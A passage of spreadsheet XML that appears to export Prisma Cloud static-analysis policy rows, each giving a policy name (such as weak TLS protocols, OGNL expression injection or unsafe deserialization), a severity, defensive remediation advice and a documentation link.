        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C411" s="2" t="inlineStr"/>
      <c r="D411" t="inlineStr"/>
      <c r="E411" t="inlineStr"/>
      <c r="F411" t="inlineStr"/>
      <c r="G411" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J411" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K411" t="inlineStr">
        <is>
          <t>Improper Handling of Unicode Encoding</t>
        </is>
      </c>
      <c r="L411" t="inlineStr"/>
      <c r="M411" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N411" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O411" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P411" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q411" t="inlineStr"/>
      <c r="R411" t="inlineStr"/>
      <c r="S411" t="inlineStr"/>
      <c r="T411" t="b">
        <v>0</v>
      </c>
      <c r="U411" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V411" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W411" t="inlineStr">
        <is>
          <t>The product does not properly handle when an input contains Unicode encoding.</t>
        </is>
      </c>
      <c r="X411" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-114</t>
        </is>
      </c>
      <c r="Y411" t="inlineStr"/>
      <c r="Z411" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA411" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB411" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC411" t="inlineStr">
        <is>
          <t>CKV3_SAST_114</t>
        </is>
      </c>
      <c r="AD411" t="b">
        <v>1</v>
      </c>
      <c r="AE411" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF411" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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1" t="inlineStr">
        <is>
          <t>5be19861-94a7-423a-8053-4e5463f05cce</t>
        </is>
      </c>
      <c r="AI411" t="inlineStr"/>
      <c r="AJ411" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK411" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" t="inlineStr"/>
      <c r="B412" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C412" s="2" t="inlineStr"/>
      <c r="D412" t="inlineStr"/>
      <c r="E412" t="inlineStr"/>
      <c r="F412" t="inlineStr"/>
      <c r="G412" t="b">
        <v>1</v>
      </c>
      <c r="H4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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J412" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K412" t="inlineStr">
        <is>
          <t>Weak SSL/TLS protocols</t>
        </is>
      </c>
      <c r="L412" t="inlineStr"/>
      <c r="M412" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N412" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O412" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P412" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q412" t="inlineStr"/>
      <c r="R412" t="inlineStr"/>
      <c r="S412" t="inlineStr"/>
      <c r="T412" t="b">
        <v>0</v>
      </c>
      <c r="U412" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V412" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W412" t="inlineStr">
        <is>
          <t>Ensure the application uses secure SSL/TLS protocol versions (TLSv1.2 or higher) to protect against interception and tampering. Avoid protocols that are known to be insecure or outdated, such as TLSv1.0 or TLSv1.1. Relying on system defaults might be non-compliant; ensure explicit configurations in all cases.</t>
        </is>
      </c>
      <c r="X412" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-77</t>
        </is>
      </c>
      <c r="Y412" t="inlineStr"/>
      <c r="Z412" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA412" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB412" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC412" t="inlineStr">
        <is>
          <t>CKV3_SAST_77</t>
        </is>
      </c>
      <c r="AD412" t="b">
        <v>1</v>
      </c>
      <c r="AE412" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF412" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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2" t="inlineStr">
        <is>
          <t>8188789a-90fa-4e7e-acba-942e682f8c4d</t>
        </is>
      </c>
      <c r="AI412" t="inlineStr"/>
      <c r="AJ412" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK412" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" t="inlineStr"/>
      <c r="B413" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C413" s="2" t="inlineStr"/>
      <c r="D413" t="inlineStr"/>
      <c r="E413" t="inlineStr"/>
      <c r="F413" t="inlineStr"/>
      <c r="G413" t="b">
        <v>1</v>
      </c>
      <c r="H4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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J413" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K413" t="inlineStr">
        <is>
          <t>Inadequate SSL/TLS encryption strength</t>
        </is>
      </c>
      <c r="L413" t="inlineStr"/>
      <c r="M413" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N413" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O413" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P413" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q413" t="inlineStr"/>
      <c r="R413" t="inlineStr"/>
      <c r="S413" t="inlineStr"/>
      <c r="T413" t="b">
        <v>0</v>
      </c>
      <c r="U413" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V413" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W413" t="inlineStr">
        <is>
          <t>An insecure SSL version was detected. TLS versions 1.0, 1.1, and all SSL versions are considered weak encryption and are deprecated. Use 'ssl.PROTOCOL_TLSv1_2' or higher.</t>
        </is>
      </c>
      <c r="X413" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-65</t>
        </is>
      </c>
      <c r="Y413" t="inlineStr"/>
      <c r="Z413" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA413" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB413" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC413" t="inlineStr">
        <is>
          <t>CKV3_SAST_65</t>
        </is>
      </c>
      <c r="AD413" t="b">
        <v>1</v>
      </c>
      <c r="AE413" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF413" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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3" t="inlineStr">
        <is>
          <t>591a8764-fed2-406c-9b37-7e6654f18b9c</t>
        </is>
      </c>
      <c r="AI413" t="inlineStr"/>
      <c r="AJ413" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK413" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" t="inlineStr"/>
      <c r="B414" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C414" s="2" t="inlineStr"/>
      <c r="D414" t="inlineStr"/>
      <c r="E414" t="inlineStr"/>
      <c r="F414" t="inlineStr"/>
      <c r="G414" t="b">
        <v>1</v>
      </c>
      <c r="H4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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J414" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K414" t="inlineStr">
        <is>
          <t>Use of root directory in HTTP handler</t>
        </is>
      </c>
      <c r="L414" t="inlineStr"/>
      <c r="M414" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N414" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O414" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P414" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q414" t="inlineStr"/>
      <c r="R414" t="inlineStr"/>
      <c r="S414" t="inlineStr"/>
      <c r="T414" t="b">
        <v>0</v>
      </c>
      <c r="U414" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V414" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W414" t="inlineStr">
        <is>
          <t>This policy identifies instances where Go applications expose the entire filesystem by mounting the root directory / to an HTTP handler function. This can allow anyone with access to the HTTP server to access any file that the server has access to. It is recommended to restrict the http.Dir path to a specific folder instead of the entire filesystem.</t>
        </is>
      </c>
      <c r="X414" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-253</t>
        </is>
      </c>
      <c r="Y414" t="inlineStr"/>
      <c r="Z414" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA414" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB414" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC414" t="inlineStr">
        <is>
          <t>CKV3_SAST_253</t>
        </is>
      </c>
      <c r="AD414" t="b">
        <v>1</v>
      </c>
      <c r="AE414" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF414" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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4" t="inlineStr">
        <is>
          <t>b64e409d-7edd-4325-bb73-8bdf0ab29a5a</t>
        </is>
      </c>
      <c r="AI414" t="inlineStr"/>
      <c r="AJ414" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK414" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" t="inlineStr"/>
      <c r="B415" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C415" s="2" t="inlineStr"/>
      <c r="D415" t="inlineStr"/>
      <c r="E415" t="inlineStr"/>
      <c r="F415" t="inlineStr"/>
      <c r="G415" t="b">
        <v>1</v>
      </c>
      <c r="H4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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J415" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K415" t="inlineStr">
        <is>
          <t>Prevent Public Network Access to Cloud Resources</t>
        </is>
      </c>
      <c r="L415" t="inlineStr"/>
      <c r="M415" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N415" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O415" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P415" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q415" t="inlineStr"/>
      <c r="R415" t="inlineStr"/>
      <c r="S415" t="inlineStr"/>
      <c r="T415" t="b">
        <v>0</v>
      </c>
      <c r="U415" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V415" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W415" t="inlineStr">
        <is>
          <t>Avoid publishing cloud services on the Internet unless necessary. Use private networks and secure communication methods such as VPC peering. If a cloud resource doesn't support a lack of public IP, assign a public IP but don't create listeners for it.</t>
        </is>
      </c>
      <c r="X415" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-79</t>
        </is>
      </c>
      <c r="Y415" t="inlineStr"/>
      <c r="Z415" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA415" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB415" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC415" t="inlineStr">
        <is>
          <t>CKV3_SAST_79</t>
        </is>
      </c>
      <c r="AD415" t="b">
        <v>1</v>
      </c>
      <c r="AE415" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF415" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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5" t="inlineStr">
        <is>
          <t>de1a12a0-4c0c-4bf4-b879-4e4d0bd09482</t>
        </is>
      </c>
      <c r="AI415" t="inlineStr"/>
      <c r="AJ415" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK415" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" t="inlineStr"/>
      <c r="B416" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C416" s="2" t="inlineStr"/>
      <c r="D416" t="inlineStr"/>
      <c r="E416" t="inlineStr"/>
      <c r="F416" t="inlineStr"/>
      <c r="G416" t="b">
        <v>1</v>
      </c>
      <c r="H4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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J416" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K416" t="inlineStr">
        <is>
          <t>PyTorch Missing Hash Check</t>
        </is>
      </c>
      <c r="L416" t="inlineStr"/>
      <c r="M416" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N416" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O416" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P416" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q416" t="inlineStr"/>
      <c r="R416" t="inlineStr"/>
      <c r="S416" t="inlineStr"/>
      <c r="T416" t="b">
        <v>0</v>
      </c>
      <c r="U416" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V416" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W416" t="inlineStr">
        <is>
          <t>Detected usage of PyTorch loading remote files without available hash checks. Use the `hash_prefix` or `check_hash` argument to  valiate the beginning of the hash of the remote file.</t>
        </is>
      </c>
      <c r="X416" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-194</t>
        </is>
      </c>
      <c r="Y416" t="inlineStr"/>
      <c r="Z416" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA416" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB416" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC416" t="inlineStr">
        <is>
          <t>CKV3_SAST_194</t>
        </is>
      </c>
      <c r="AD416" t="b">
        <v>1</v>
      </c>
      <c r="AE416" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF416" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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6" t="inlineStr">
        <is>
          <t>c2894ccb-3db7-4354-aef0-dfb58c908bdb</t>
        </is>
      </c>
      <c r="AI416" t="inlineStr"/>
      <c r="AJ416" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK416" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" t="inlineStr"/>
      <c r="B417" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C417" s="2" t="inlineStr"/>
      <c r="D417" t="inlineStr"/>
      <c r="E417" t="inlineStr"/>
      <c r="F417" t="inlineStr"/>
      <c r="G417" t="b">
        <v>1</v>
      </c>
      <c r="H4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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J417" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K417" t="inlineStr">
        <is>
          <t>Expression injection (OGNL)</t>
        </is>
      </c>
      <c r="L417" t="inlineStr"/>
      <c r="M417" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N417" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O417" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P417" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q417" t="inlineStr"/>
      <c r="R417" t="inlineStr"/>
      <c r="S417" t="inlineStr"/>
      <c r="T417" t="b">
        <v>0</v>
      </c>
      <c r="U417" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V417" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W417" t="inlineStr">
        <is>
          <t>OGNL accesses Java objects in ActionContext. Its low-level functions can lead to remote code execution. Use struts tags over raw ${} EL expressions for user input. Avoid OGNL packages like com.opensymphony.xwork2.ognl and org.apache.struts2.util.StrutsUtil with user data. Prioritize security in input handling.</t>
        </is>
      </c>
      <c r="X417" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-171</t>
        </is>
      </c>
      <c r="Y417" t="inlineStr"/>
      <c r="Z417" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA417" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB417" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC417" t="inlineStr">
        <is>
          <t>CKV3_SAST_171</t>
        </is>
      </c>
      <c r="AD417" t="b">
        <v>1</v>
      </c>
      <c r="AE417" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF417" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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7" t="inlineStr">
        <is>
          <t>4a43dab3-6f0c-47d6-85e4-7bf5aba5feae</t>
        </is>
      </c>
      <c r="AI417" t="inlineStr"/>
      <c r="AJ417" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK417" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" t="inlineStr"/>
      <c r="B418" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C418" s="2" t="inlineStr"/>
      <c r="D418" t="inlineStr"/>
      <c r="E418" t="inlineStr"/>
      <c r="F418" t="inlineStr"/>
      <c r="G418" t="b">
        <v>1</v>
      </c>
      <c r="H4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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J418" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K418" t="inlineStr">
        <is>
          <t>Restrict unnecessarily powerful browser features</t>
        </is>
      </c>
      <c r="L418" t="inlineStr"/>
      <c r="M418" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N418" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O418" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P418" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q418" t="inlineStr"/>
      <c r="R418" t="inlineStr"/>
      <c r="S418" t="inlineStr"/>
      <c r="T418" t="b">
        <v>0</v>
      </c>
      <c r="U418" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V418" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W418" t="inlineStr">
        <is>
          <t>Powerful browser features like geolocation, camera, and microphone are accessible via JavaScript API and often need user permission. Due to their significant privacy and security implications, use them only for critical application functionalities. This rule flags permissions when requested with the standard web browser query API and specific APIs related to the permission.</t>
        </is>
      </c>
      <c r="X418" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-78</t>
        </is>
      </c>
      <c r="Y418" t="inlineStr"/>
      <c r="Z418" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA418" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB418" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC418" t="inlineStr">
        <is>
          <t>CKV3_SAST_78</t>
        </is>
      </c>
      <c r="AD418" t="b">
        <v>1</v>
      </c>
      <c r="AE418" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF418" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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8" t="inlineStr">
        <is>
          <t>831b3a33-c188-40fb-a0e0-a28c7364ba4d</t>
        </is>
      </c>
      <c r="AI418" t="inlineStr"/>
      <c r="AJ418" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK418" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" t="inlineStr"/>
      <c r="B419" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C419" s="2" t="inlineStr"/>
      <c r="D419" t="inlineStr"/>
      <c r="E419" t="inlineStr"/>
      <c r="F419" t="inlineStr"/>
      <c r="G419" t="b">
        <v>1</v>
      </c>
      <c r="H4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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J419" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K419" t="inlineStr">
        <is>
          <t>Untrusted data unsafely deserialized</t>
        </is>
      </c>
      <c r="L419" t="inlineStr"/>
      <c r="M419" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N419" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O419" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P419" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q419" t="inlineStr"/>
      <c r="R419" t="inlineStr"/>
      <c r="S419" t="inlineStr"/>
      <c r="T419" t="b">
        <v>0</v>
      </c>
      <c r="U419" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V419" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W419" t="inlineStr">
        <is>
          <t>Detected unsafe deserialization of unvalidated data. When using third party deserializer, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data with JSON.parse() and Buffer.from().</t>
        </is>
      </c>
      <c r="X419" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-192</t>
        </is>
      </c>
      <c r="Y419" t="inlineStr"/>
      <c r="Z419" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA419" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB419" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC419" t="inlineStr">
        <is>
          <t>CKV3_SAST_192</t>
        </is>
      </c>
      <c r="AD419" t="b">
        <v>1</v>
      </c>
      <c r="AE419" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF419" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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19" t="inlineStr">
        <is>
          <t>63701fb1-00af-47d1-b127-0228553b1156</t>
        </is>
      </c>
      <c r="AI419" t="inlineStr"/>
      <c r="AJ419" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK419" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" t="inlineStr"/>
      <c r="B420" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C420" s="2" t="inlineStr"/>
      <c r="D420" t="inlineStr"/>
      <c r="E420" t="inlineStr"/>
      <c r="F420" t="inlineStr"/>
      <c r="G420" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J420" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K420" t="inlineStr">
        <is>
          <t>Download of Machine Learning Model Without Integrity Check</t>
        </is>
      </c>
      <c r="L420" t="inlineStr"/>
      <c r="M420" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N420" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O420" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P420" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q420" t="inlineStr"/>
      <c r="R420" t="inlineStr"/>
      <c r="S420" t="inlineStr"/>
      <c r="T420" t="b">
        <v>0</v>
      </c>
      <c r="U420" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V420" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W420" t="inlineStr">
        <is>
          <t>Machine Learning (ML) models should only be referenced as specifically as possible. Use the "revision" parameter to specify a specific commit.</t>
        </is>
      </c>
      <c r="X420" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-99</t>
        </is>
      </c>
      <c r="Y420" t="inlineStr"/>
      <c r="Z420" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA420" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB420" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC420" t="inlineStr">
        <is>
          <t>CKV3_SAST_99</t>
        </is>
      </c>
      <c r="AD420" t="b">
        <v>1</v>
      </c>
      <c r="AE420" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF420" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG4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0" t="inlineStr">
        <is>
          <t>f91cc8cd-05e3-4f0f-be35-09009bf5a325</t>
        </is>
      </c>
      <c r="AI420" t="inlineStr"/>
      <c r="AJ420" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK420" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" t="inlineStr"/>
      <c r="B421" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C421" s="2" t="inlineStr"/>
      <c r="D421" t="inlineStr"/>
      <c r="E421" t="inlineStr"/>
      <c r="F421" t="inlineStr"/>
      <c r="G421" t="b">
        <v>1</v>
      </c>
      <c r="H4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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J421" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K421" t="inlineStr">
        <is>
          <t>Improper validation of certificate with host mismatch</t>
        </is>
      </c>
      <c r="L421" t="inlineStr"/>
      <c r="M421" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N421" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O421" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
